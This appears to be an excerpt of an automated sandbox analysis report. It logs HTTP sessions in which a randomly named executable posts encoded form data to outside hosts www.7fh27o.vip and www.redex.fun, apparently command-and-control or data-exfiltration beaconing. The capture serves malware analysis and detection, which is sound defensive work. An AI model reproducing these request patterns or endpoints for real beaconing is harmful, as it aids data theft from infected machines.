                                                                                                Data Raw: 49 42 51 50 3d 6b 56 6b 6b 73 54 68 38 59 7a 47 73 71 66 34 63 31 49 71 53 66 66 36 6a 2f 37 54 2f 63 4e 49 64 65 4b 62 39 4e 68 4a 64 30 7a 2b 42 45 4d 7a 52 59 67 41 6b 6c 6d 53 47 59 49 41 5a 76 4c 4a 6b 6e 76 4e 51 6e 41 4d 7a 62 4c 7a 70 72 78 66 65 42 53 33 2f 52 6b 45 34 4f 52 59 4d 6a 33 5a 6b 76 4c 2f 46 58 45 38 62 34 63 34 6f 53 61 73 65 64 50 51 73 4f 67 59 70 6a 61 70 4a 54 4d 2b 36 42 6a 30 30 61 4a 47 31 79 31 4f 71 48 48 30 7a 6a 72 38 61 35 73 36 6e 67 35 37 68 30 71 79 43 46 6d 66 76 4e 37 43 69 49 36 78 71 45 50 46 68 64 64 52 58 75 38 71 51 32 68 42 33 55 63 50 6f 79 67 7a 54 6f 55 74 68 67 63 68 31 59 33 32 47 79 64 57 31 35 6c 51 3d
                                                                                                Data Ascii: IBQP=kVkksTh8YzGsqf4c1IqSff6j/7T/cNIdeKb9NhJd0z+BEMzRYgAklmSGYIAZvLJknvNQnAMzbLzprxfeBS3/RkE4ORYMj3ZkvL/FXE8b4c4oSasedPQsOgYpjapJTM+6Bj00aJG1y1OqHH0zjr8a5s6ng57h0qyCFmfvN7CiI6xqEPFhddRXu8qQ2hB3UcPoygzToUthgch1Y32GydW15lQ=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.11.20497533.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:35.182434082 CET1289OUTPOST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 6b 56 6b 6b 73 54 68 38 59 7a 47 73 71 66 34 63 31 49 71 53 66 66 36 6a 2f 37 54 2f 63 4e 49 64 65 4b 62 39 4e 68 4a 64 30 7a 32 42 46 36 6e 52 59 47 49 6b 69 6d 53 47 47 59 41 55 76 4c 49 30 6e 75 6c 55 6e 42 77 4a 62 4f 33 70 71 52 44 65 47 6d 44 2f 66 6b 45 34 47 78 59 4e 6e 33 5a 78 76 4c 76 42 58 46 4d 62 34 63 34 6f 53 63 6f 65 61 65 51 73 64 51 59 6f 30 71 70 4e 58 4d 2b 57 42 6a 64 42 61 4a 4c 58 79 46 75 71 48 6b 63 7a 34 34 45 61 31 73 36 35 6c 35 37 35 30 71 4f 64 46 69 33 72 4e 36 32 45 49 38 56 71 48 59 39 32 45 65 5a 73 73 4e 2f 66 2b 56 46 51 65 66 76 59 79 7a 44 4d 74 43 39 70 68 61 35 69 48 47 66 4d 6c 39 4c 31 6e 51 49 76 34 68 34 36 69 54 41 33 2f 30 53 31 46 49 39 67 6e 6a 34 72 50 37 57 59 2f 4d 4e 71 73 48 6e 38 64 36 7a 77 33 55 36 72 6d 71 45 4f 57 7a 6e 35 68 49 45 6c 55 46 4e 6f 51 49 77 34 45 2f 47 57 5a 4e 57 4f 35 64 39 4e 4d 45 49 73 79 42 38 6b 36 66 71 7a 5a 32 79 69 4a 7a 61 30 6e 76 6b 42 48 51 36 74 75 6d 32 38 58 32 63 70 61 6a 71 4e 68 70 50 61 53 [TRUNCATED]
                                                                                                Data Ascii: IBQP=kVkksTh8YzGsqf4c1IqSff6j/7T/cNIdeKb9NhJd0z2BF6nRYGIkimSGGYAUvLI0nulUnBwJbO3pqRDeGmD/fkE4GxYNn3ZxvLvBXFMb4c4oScoeaeQsdQYo0qpNXM+WBjdBaJLXyFuqHkcz44Ea1s65l5750qOdFi3rN62EI8VqHY92EeZssN/f+VFQefvYyzDMtC9pha5iHGfMl9L1nQIv4h46iTA3/0S1FI9gnj4rP7WY/MNqsHn8d6zw3U6rmqEOWzn5hIElUFNoQIw4E/GWZNWO5d9NMEIsyB8k6fqzZ2yiJza0nvkBHQ6tum28X2cpajqNhpPaSQBiSYQZ8ke4jLLVJRN4d799BNeVzsHJuEat8xX7T2JblEHeqOSVEnyzJl2s/PksiUarj+qnY47AEdPm1ljLLSHoLjEofexf1VLPAZs2PbVP/N0mkYuaRY4NGECxW3VxOET9ue/X+wJvjjVgtlQSj7b+ZVVQDgLepU7Yua8dyNvX8tCokLsqWBQY5D5bqGqORVu9P0OvN6rgIbPQYbJyWFVL5wqef/EQgKCejwq74ImSNszEvWmUHpZNVNezg1sOevbM9kkBIvWf3g/zA0syOqQMtjbwGQPh4cgnMiMf/nkknmmfJc1AxFn0UtJ6D4UJnFub8dWrljimRvJlZEGHj6UFdGjCdk8yV4aPTtvNNqbxU8A4wBNg+9oqkPB3wg7Cv2O3frYbGazufJdot1
                                                                                                Nov 11, 2024 17:01:35.182477951 CET1289OUTData Raw: 59 51 50 6f 45 74 73 43 79 49 73 62 53 47 6d 56 68 2b 4a 42 51 2f 67 38 61 65 79 6f 57 5a 69 44 41 45 79 4c 52 47 74 65 2f 36 79 62 4c 50 4d 35 6f 79 4c 6c 59 62 65 31 61 30 68 61 42 45 30 55 32 71 4b 55 42 66 41 6e 36 57 50 67 42 4f 64 68 6a 4e
                                                                                                Data Ascii: YQPoEtsCyIsbSGmVh+JBQ/g8aeyoWZiDAEyLRGte/6ybLPM5oyLlYbe1a0haBE0U2qKUBfAn6WPgBOdhjNJ68jgcUIvlEPPb/VUO9KtsQZfiqqmZBWP1tHRVXwiG/OaXgBSotqZWSZsBcfquQybSazBiHJTVYbdnWXXEFHQucx60VSEHUlRlUo4L48wGj5KcUsqR8FoYoUPoqwEeEJy2mPUFCjaa3bxxAdetxVeOoydiBzi76uq
                                                                                                Nov 11, 2024 17:01:35.182528973 CET5341OUTData Raw: 37 47 34 31 55 45 33 52 47 53 6e 56 2b 32 35 61 75 35 6d 4e 58 42 6c 30 57 33 45 2b 58 50 4b 79 41 76 4c 78 67 48 57 5a 65 36 2f 33 72 64 30 34 54 4b 74 32 2f 2f 74 38 73 31 53 43 34 57 5a 74 38 6f 6e 33 68 52 72 44 64 41 30 64 51 67 44 61 39 4f
                                                                                                Data Ascii: 7G41UE3RGSnV+25au5mNXBl0W3E+XPKyAvLxgHWZe6/3rd04TKt2//t8s1SC4WZt8on3hRrDdA0dQgDa9OACAfaTMC0JkWOK0FXyjhw8dJMsXp6ELMm1db32jSnvH5MunlSWR61YoOAbh7ZTOfXFmSH1x5wmEhsMKGA/TCZaDlcmhjsHHfdNrOV8t+ZE8do8fAzKDUURPnP99Yqw+qUqOYV3H3UsG02QB/J/d7eVKSMXetfKNQv


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.11.20497543.33.130.190807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:37.832010031 CET494OUTGET /bpf5/?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:01:37.974514961 CET400INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:01:37 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 42 51 50 3d 70 58 4d 45 76 69 39 64 52 54 6d 53 71 65 30 59 2f 34 47 42 58 5a 44 78 2b 59 4f 75 53 2f 39 31 61 62 2f 4f 4f 68 78 66 77 42 54 68 4e 35 62 73 65 30 4a 6b 6d 6a 71 31 56 4b 45 4f 78 4c 73 62 72 63 68 6e 33 53 73 4c 4b 72 6d 6e 68 44 4c 6d 65 6c 72 64 59 68 74 42 41 46 31 57 70 57 42 2b 6c 4b 62 73 66 33 70 32 2b 4d 73 35 61 63 64 49 62 74 55 33 4b 32 51 3d 26 4c 72 33 3d 75 48 4d 4c 54 48 52 50 43 70 73 64 61 70 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.11.2049755185.68.16.94807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:43.756465912 CET747OUTPOST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 52 55 6e 42 78 78 2f 4b 67 61 43 6e 72 4f 61 4a 61 77 33 57 6b 32 46 72 42 66 69 44 77 46 70 78 32 6d 6f 39 67 46 4b 59 6b 50 4e 4c 69 70 64 42 50 36 36 72 4c 6d 38 4c 6e 79 4d 59 67 62 42 59 51 49 70 76 51 51 67 57 63 59 34 77 76 54 7a 67 62 30 62 6d 59 76 36 4f 41 53 6d 51 38 65 72 5a 45 53 6a 62 42 34 48 52 46 65 47 59 7a 50 69 47 32 48 75 33 4d 67 45 5a 34 31 6c 74 4c 5a 69 43 77 55 32 62 37 51 6c 36 64 72 58 31 31 6d 69 6c 55 74 53 53 35 4e 37 4a 6d 70 5a 75 67 37 71 48 45 6c 4e 2f 35 4d 4b 4a 66 45 68 43 56 67 6c 51 73 33 32 65 67 65 42 47 76 5a 50 30 6c 65 42 6d 43 41 3d 3d
                                                                                                Data Ascii: IBQP=RUnBxx/KgaCnrOaJaw3Wk2FrBfiDwFpx2mo9gFKYkPNLipdBP66rLm8LnyMYgbBYQIpvQQgWcY4wvTzgb0bmYv6OASmQ8erZESjbB4HRFeGYzPiG2Hu3MgEZ41ltLZiCwU2b7Ql6drX11milUtSS5N7JmpZug7qHElN/5MKJfEhCVglQs32egeBGvZP0leBmCA==
                                                                                                Nov 11, 2024 17:01:44.004575968 CET735INHTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:01:43 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.11.2049756185.68.16.94807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:46.540749073 CET767OUTPOST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 52 55 6e 42 78 78 2f 4b 67 61 43 6e 71 75 71 4a 66 51 4c 57 7a 6d 46 6f 45 66 69 44 70 31 70 39 32 6d 73 39 67 45 50 64 6b 36 64 4c 69 4a 4e 42 64 76 4f 72 4d 6d 38 4c 76 53 4d 52 39 4c 42 58 51 49 6c 52 51 51 73 57 63 59 73 77 76 53 44 67 62 6a 48 6c 62 66 36 4d 62 43 6d 65 68 4f 72 5a 45 53 6a 62 42 34 69 4b 46 65 75 59 7a 2f 53 47 32 6d 75 77 43 41 45 65 79 56 6c 74 50 5a 6a 71 77 55 33 4d 37 53 51 66 64 76 6e 31 31 6e 79 6c 55 35 4f 4e 77 4e 37 50 37 35 59 58 6a 71 33 6a 49 6c 4e 4b 35 2b 61 68 46 6c 39 71 55 32 6f 4b 78 46 43 36 6a 4e 64 30 72 70 32 63 6e 63 41 39 66 4c 65 46 75 42 4a 77 46 48 62 6e 31 6d 4c 66 65 4b 70 53 66 38 63 3d
                                                                                                Data Ascii: IBQP=RUnBxx/KgaCnquqJfQLWzmFoEfiDp1p92ms9gEPdk6dLiJNBdvOrMm8LvSMR9LBXQIlRQQsWcYswvSDgbjHlbf6MbCmehOrZESjbB4iKFeuYz/SG2muwCAEeyVltPZjqwU3M7SQfdvn11nylU5ONwN7P75YXjq3jIlNK5+ahFl9qU2oKxFC6jNd0rp2cncA9fLeFuBJwFHbn1mLfeKpSf8c=
                                                                                                Nov 11, 2024 17:01:46.788795948 CET735INHTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:01:46 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.11.2049757185.68.16.94807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:49.321801901 CET3867OUTPOST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 52 55 6e 42 78 78 2f 4b 67 61 43 6e 71 75 71 4a 66 51 4c 57 7a 6d 46 6f 45 66 69 44 70 31 70 39 32 6d 73 39 67 45 50 64 6b 35 39 4c 68 37 31 42 50 63 6d 72 4e 6d 38 4c 6c 79 4d 63 39 4c 42 4f 51 49 39 64 51 51 78 70 63 61 55 77 75 30 2f 67 50 47 7a 6c 41 50 36 4d 45 53 6d 66 38 65 72 49 45 53 7a 6c 42 34 53 4b 46 65 75 59 7a 38 4b 47 77 33 75 77 53 77 45 5a 34 31 6c 68 4c 5a 6a 52 77 55 75 35 37 53 56 71 63 65 62 31 31 48 43 6c 57 4b 6d 4e 73 64 37 4e 34 35 59 6d 6a 71 37 38 49 68 74 73 35 2f 2b 4c 46 6e 64 71 58 43 30 56 68 55 4b 51 2b 4f 74 67 72 70 79 54 7a 73 45 4d 58 36 47 63 6d 67 70 6e 45 69 72 76 31 32 50 55 4d 4b 6c 79 64 38 65 55 66 4b 65 38 66 64 4e 72 74 49 4f 2b 58 42 39 44 30 75 71 70 32 7a 39 51 63 4e 35 67 59 2f 42 7a 57 73 4d 74 39 34 62 2f 64 6c 69 4a 77 35 54 42 61 51 48 72 6f 31 48 4a 71 65 49 4a 57 6c 39 74 38 51 75 63 53 33 6b 65 34 68 6c 34 6e 37 6d 32 66 62 2b 59 4d 36 43 79 4c 5a 34 67 66 79 67 47 38 6b 53 52 46 69 76 71 2f 77 4a 71 77 5a 6b 37 51 44 78 4c 69 [TRUNCATED]
                                                                                                Data Ascii: IBQP=RUnBxx/KgaCnquqJfQLWzmFoEfiDp1p92ms9gEPdk59Lh71BPcmrNm8LlyMc9LBOQI9dQQxpcaUwu0/gPGzlAP6MESmf8erIESzlB4SKFeuYz8KGw3uwSwEZ41lhLZjRwUu57SVqceb11HClWKmNsd7N45Ymjq78Ihts5/+LFndqXC0VhUKQ+OtgrpyTzsEMX6GcmgpnEirv12PUMKlyd8eUfKe8fdNrtIO+XB9D0uqp2z9QcN5gY/BzWsMt94b/dliJw5TBaQHro1HJqeIJWl9t8QucS3ke4hl4n7m2fb+YM6CyLZ4gfygG8kSRFivq/wJqwZk7QDxLi1miCE0SjioNYyzMpmlTfKo0bvZZbQvnWPXNhvGEphFyjkCI6+4GceFumRaPq/G1SiVizQd5ukWDuOcvIg8IaVD5lX0W0hfX/vZoQxxO6wTNHnshlmaHWlA6/E1LL7qAxzw6vN24S/wtCHmXa6ZQkda1d8ntvR2VG9X2amusM/i62oZi/3Nr06gOAJIDcxOp1DV+klok6YdW8JexeY83ORswwf6r7qoYb9G8mDTbTtoq3tqhFLHVRBECcy+BbP/JLBHTL26gpQ9B89XMND8mxH8Q90GZE8jkiYJ/iHy7OKjcqmYaCjw5d+Ch8gcrUAPuwVWeui+rWbbqoHvDlxS0iMQIIAdvoiXqI+/XJUF9D4qbS+VymCazIqMrnjjVWWIzHNeNy8TakZSLKXykQiUWnfATR0suJLQZ1dAgaJMyeauCS6Ff0FJYxUrZR/2jNEwn9jpLahomSYQcvl02Ml7/PeXgo+sRlB4epHsbtUk+b8zT5mxCZrlJqNG22Nf6gL5iUe3toHTY026v0nQMrWdYRRQeVGYicnVu8n32L2dSOgvRWXlt5JXLtIYFZ74XdNbkpayLbOjiiF2J/mJAogS6KFparFTqtu6uqbO38g6Hc1GWuWWWFxtwEvClV/PONvBdMQzrgQ0c3Sb2/FVimMjwD9oXurSOyNGfZt7 [TRUNCATED]
                                                                                                Nov 11, 2024 17:01:49.321827888 CET4049OUTData Raw: 42 37 49 33 31 36 6b 2b 48 67 4a 31 51 79 54 50 53 38 59 50 61 30 4a 45 43 7a 66 7a 69 36 6d 63 4d 78 73 72 45 59 74 57 6e 4b 5a 73 49 45 45 73 6d 42 6c 51 55 35 4e 4a 4b 53 73 50 33 53 78 67 31 47 35 76 62 2b 58 75 74 62 51 4e 4e 2f 4d 63 48 69
                                                                                                Data Ascii: B7I316k+HgJ1QyTPS8YPa0JECzfzi6mcMxsrEYtWnKZsIEEsmBlQU5NJKSsP3Sxg1G5vb+XutbQNN/McHiEhr2S0JXwzCLLMo/Yki3cxUtLElI68uxl5xwRBNtO/+3wyeEXxqFLDjVz6ojMU/93DhiKc/MYFo+OJW+z7NxxUXLGqcNeyRQqYUutFRcmj035UpqDdSwpB0B9iZF2fW0nPRU8cZKKSX+Cy4ndnny+R5cp21QBvSeJ
                                                                                                Nov 11, 2024 17:01:49.570049047 CET735INHTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:01:49 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.11.2049758185.68.16.94807940C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:01:52.099905968 CET493OUTGET /7tio/?IBQP=cWPhyGnsppbegOPzdBDZ8kAQGuS94D1G+AoDqW+mjKcXo4pHCPC/PWAHmCcbh45dI7FSbj8dWK0Lqwzkb07fC7SLHWTv9NL+DwjYDKm9EtTm1O3Sw1W7F3k=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:01:52.348261118 CET1289INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:01:52 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
